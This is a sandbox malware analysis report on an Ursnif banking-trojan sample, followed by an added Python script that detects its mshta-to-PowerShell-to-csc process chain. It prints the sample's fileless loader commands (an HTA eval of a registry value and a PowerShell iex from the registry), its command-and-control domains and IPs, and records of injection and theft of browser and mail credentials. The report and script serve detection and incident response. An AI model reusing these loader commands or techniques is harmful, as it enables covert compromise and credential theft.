Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580 (2 identical entries)
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580 (3 identical entries)
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9EC000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 4980000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write (2 identical entries)
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write (4 identical entries)
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 6752
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
Source: C:\Windows\explorer.exe Thread register set: target process: 3656
Source: C:\Windows\explorer.exe Thread register set: target process: 4268
Source: C:\Windows\explorer.exe Thread register set: target process: 4772
Source: C:\Windows\explorer.exe Thread register set: target process: 5772
Source: C:\Windows\explorer.exe Thread register set: target process: 6228
Source: C:\Windows\explorer.exe Thread register set: target process: 6020
Source: C:\Windows\System32\control.exe Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe Thread register set: target process: 5528
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF672E412E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 1050000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF672E412E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9EC000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 4980000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF6A9395FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 284AA390000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF6A9395FD0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: explorer.exe, 0000001E.00000000.830065181.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000000.845870000.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
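
Added example (not part of this Joe Sandbox report and not the sample's own code): the Python below implements the process-creation logic behind the Sigma matches this report lists (MSHTA Spawning Windows Shell, Suspicious Csc.exe Source File Folder, Dot net compiler compiles file from suspicious location) together with a rule for the mshta and powershell registry-loader command lines shown above. The events it scans are constructed from the 'Process created' lines of this report; the MSBuild and Get-Process events are invented benign controls, and the rule names, the ProcEvent/Finding types and registry_target() are assumptions of this example rather than anything the report defines. The part that matters for incident response is registry_target(): the HTA stage (regread of Audiinrt) and the PowerShell stage (gp ... .Barclers) read two values of the same key, HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E, so that key is what to export from the affected user hive.

```python
"""Process-creation rules for the mshta -> powershell -> csc.exe chain in this report.
Added example, not part of the sandbox report or of Joe Sandbox; in practice feed
Sysmon Event ID 1 or EDR process events into check_event()."""
import re
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image path ("unknown" where the sandbox recorded none)
    image: str    # created process image path
    cmdline: str  # created process command line

@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str

_SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")
_HTA_LOADER = ("about:<hta:application>", "regread(")  # inline HTA that evals a registry value
_PS_LOADER = ("iex", "gp 'hkcu:", "appdatalow")         # iex of bytes read from HKCU\Software\AppDataLow
_TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def registry_target(cmdline: str) -> Optional[tuple[str, str]]:
    """(key, value_name) read by a loader command line, or None.
    Handles regread('...') (mshta stage) and (gp 'HKCU:...').Name (powershell stage);
    the key is normalised to HKCU\\... with single backslashes so both stages compare equal."""
    m = re.search(r"regread\('([^']+)'\)", cmdline, re.IGNORECASE)
    if m:
        full = m.group(1)
    else:
        m = re.search(r"\bgp\s+'([^']+)'\s*\)\s*\.(\w+)", cmdline, re.IGNORECASE)
        if not m:
            return None
        full = m.group(1).rstrip("\\") + "\\" + m.group(2)
    full = re.sub(r"^HKCU:\\?", r"HKCU\\", full, flags=re.IGNORECASE)  # HKCU:Software -> HKCU\Software
    full = re.sub(r"\\+", r"\\", full)                                 # undo JScript/PowerShell escaping
    key, _, value = full.rpartition("\\")
    return key, value

def _describe(tgt: Optional[tuple[str, str]]) -> str:
    return f"reads {tgt[0]} value {tgt[1]}" if tgt else "registry read (target not parsed)"

def check_event(ev: ProcEvent) -> list[Finding]:
    """Apply the four rules to one process-creation event."""
    out: list[Finding] = []
    parent, image, cl = _basename(ev.parent), _basename(ev.image), ev.cmdline.lower()
    if parent == "mshta.exe" and image in _SHELLS:               # Sigma: MSHTA Spawning Windows Shell
        out.append(Finding("mshta_spawns_shell", ev.image, f"parent={ev.parent}"))
    if image == "mshta.exe" and all(t in cl for t in _HTA_LOADER):
        out.append(Finding("hta_registry_loader", ev.image, _describe(registry_target(ev.cmdline))))
    if image == "powershell.exe" and all(t in cl for t in _PS_LOADER):
        out.append(Finding("powershell_registry_iex", ev.image, _describe(registry_target(ev.cmdline))))
    if image == "csc.exe" and any(d in cl for d in _TEMP_DIRS):   # Sigma: Suspicious Csc.exe Source File Folder
        out.append(Finding("csc_compiles_from_temp", ev.image, f"parent={ev.parent}"))
    return out

def scan(events) -> list[Finding]:
    return [f for ev in events for f in check_event(ev)]

def staged_registry_keys(events) -> dict[str, set[str]]:
    """Registry key -> value names read by loader command lines: the key to export during IR."""
    keys: dict[str, set[str]] = {}
    for ev in events:
        tgt = registry_target(ev.cmdline)
        if tgt:
            keys.setdefault(tgt[0], set()).add(tgt[1])
    return keys

# Constructed events: the first three mirror this report's 'Process created' lines,
# the last two are invented benign controls (not from the report).
SAMPLE_EVENTS = [
    ProcEvent("unknown", r"C:\Windows\System32\mshta.exe",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);"
              r"eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software"
              r"\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString("
              r"( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile Get-Process"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"csc.exe /noconfig /fullpaths @'C:\Users\user\source\repos\App\obj\Debug\App.cmdline'"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:24} {f.image}  {f.detail}")
    for key, names in staged_registry_keys(SAMPLE_EVENTS).items():
        print(f"export for IR: {key} -> {sorted(names)}")
```

The string rules are deliberately narrow (they key on `about:<hta:application>`, `regread(`, `gp 'HKCU:` and `AppDataLow`) so they stay quiet on the MSBuild and Get-Process controls; the parent/child rules are the generic Sigma logic and will also fire on unrelated mshta-to-shell or csc-from-Temp activity, which is the intended trade-off for a hunting query.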

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02675F3A cpuid 0_2_02675F3A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0111179C GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_0111179C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02675F3A RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_02675F3A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01111CE1 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_01111CE1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
Contains VNC / remote desktop functionality (version string found)
Source: control.exe, 00000020.00000003.854967978.000001A77A0DC000.00000004.00000040.sdmp String found in binary or memory: | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000021.00000002.914359235.0000027D4F702000.00000004.00000001.sdmp String found in binary or memory: GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000021.00000002.914359235.0000027D4F702000.00000004.00000001.sdmp String found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: rundll32.exe, 00000023.00000002.858020344.00000284AAD0C000.00000004.00000040.sdmp String found in binary or memory: GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: rundll32.exe, 00000023.00000002.858020344.00000284AAD0C000.00000004.00000040.sdmp String found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000027.00000002.914895977.000001B4FB202000.00000004.00000001.sdmp String found in binary or memory: GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000027.00000002.914895977.000001B4FB202000.00000004.00000001.sdmp String found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Behavior Graph

Behavior Graph ID: 322850   Sample: https___purefile24.top_4352...   Startdate: 26/11/2020   Architecture: WINDOWS   Score: 100

Process tree (rendered from the graph; "injected" marks processes the sample injected into rather than started):

Start
  DNS/IP: 8.8.8.8.in-addr.arpa; 1.0.0.127.in-addr.arpa; 2 other IPs or domains
  Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Ursnif; 10 other signatures
  |
  +-- mshta.exe (started)
  |     Signatures: Suspicious powershell command line found
  |     +-- powershell.exe (started)
  |           Dropped: C:\Users\user\AppData\Local\...\xxfxarla.0.cs (UTF-8); C:\Users\user\AppData\...\5ycfw01g.cmdline (UTF-8)
  |           Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
  |           +-- explorer.exe (injected)
  |           |     DNS/IP: 192.168.2.1 unknown unknown
  |           |     Signatures: Tries to steal Mail credentials (via file access); Changes memory attributes in foreign processes to executable or writable; Tries to harvest and steal browser information (history, passwords, etc); 6 other signatures
  |           |     +-- RuntimeBroker.exe (injected)
  |           |     +-- cmd.exe (started)
  |           |     +-- RuntimeBroker.exe (injected)
